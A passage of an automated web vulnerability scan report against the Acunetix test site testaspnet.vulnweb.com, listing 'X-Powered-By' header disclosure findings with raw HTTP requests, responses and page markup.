          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        24. GET http://testaspnet.vulnweb.com/sitemap.xml
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (275 bytes)
          GET http://testaspnet.vulnweb.com/sitemap.xml HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (160 bytes)
          HTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 1245
          
          
          Response body (1245 bytes)
          <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml">
          <head>
          <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
          <title>404 - File or directory not found.</title>
          <style type="text/css">
          <!--
          body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
          fieldset{padding:0 15px 10px 15px;} 
          h1{font-size:2.4em;margin:0;color:#FFF;}
          h2{font-size:1.7em;margin:0;color:#CC0000;} 
          h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
          #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
          background-color:#555555;}
          #content{margin:0 0 0 2%;position:relative;}
          .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
          -->
          </style>
          </head>
          <body>
          <div id="header"><h1>Server Error</h1></div>
          <div id="content">
           <div class="content-container"><fieldset>
            <h2>404 - File or directory not found.</h2>
            <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
           </fieldset></div>
          </div>
          </body>
          </html>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        25. GET http://testaspnet.vulnweb.com/styles.css
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/css
          Last-Modified: Thu, 29 May 2008 14:36:50 GMT
          Accept-Ranges: bytes
          ETag: "c8c2136e99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2597
          
          
          Response body (2597 bytes)
          body
          {
          	padding-right: 0px;
          	padding-left: 0px;
          	list-style-position: outside;
          	background: url(images/background.gif) #e6dccf fixed repeat-y center top;
          	padding-bottom: 0px;
          	margin: 0px;
          	font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif;
          	padding-top: 0px;
          	list-style-type: square;
          }
          A.menu
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #806640;
          	text-decoration: none;
          	background-color: #e6dccf;
          }
          A.menu:hover
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #e6dccf;
          	text-decoration: none;
          	background-color: #BF8630;
          }
          A.NewsOperation
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #BF8630;
          	margin-right: 5px;
          	text-decoration: none;
          }
          A.NewsOperation:hover
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #E6B873;
          	margin-right: 5px;
          	text-decoration: none;
          }
          .Framed
          {
          	border: #E6DCCF 1px solid;
          }
          .FramedForm
          {
          	border-right: #806640 1px solid;
          	border-top: #806640 1px solid;
          	border-left: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .MenuBar
          {
          	border-top: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .Calendar
          {
          	border-right: #e6b873 1px solid;
          	border-top: #e6b873 1px solid;
          	border-left: #e6b873 1px solid;
          	border-bottom: #e6b873 1px solid;
          }
          INPUT
          {
          	border: #806640 1px solid;
          }
          INPUT.classic
          {
          	border: none;
          }
          TEXTAREA
          {
          	border: #807940 1px solid;
          }
          INPUT.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          }
          INPUT.Login
          {
          	border: #807940 1px solid;
          	width: 250px;
          }
          TEXTAREA.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          	height: 300px;
          }
          TEXTAREA.CommentTA
          {
          	border: #807940 1px solid;
          	width: 450px;
          	height: 100px;
          }
          .NewsDate
          {
          	border-top: #e6b873 2px solid;
          	font-size: xx-small;
          	border-bottom: #e6b873 1px solid;
          }
          
          .NewsTitle
          {
          	font-weight: bolder;
          	margin-bottom: 5px;
          	text-transform: capitalize;
          	padding-top: 2px;
          }
          .NewsShort
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          }
          .NewsLong
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          	border-bottom: #e6b873 1px solid;
          }
          .CommentText
          {
          	margin-top: 10px;
          	margin-bottom: 5px;
          }
          .CommentAuthor
          {
          	font-size: xx-small;
          	margin-bottom: 10px;
          }
          .Comment
          {
          	clear: both;
          	border-right: #806640 1px solid;
          	padding-right: 5px;
          	padding-left: 5px;
          	float: none;
          	padding-bottom: 5px;
          	border-left: #806640 1px solid;
          	width: 500px;
          	padding-top: 5px;
          }
          .Calendar
          {
          	border: solid 1px #E6B873;
          }
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        26. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td 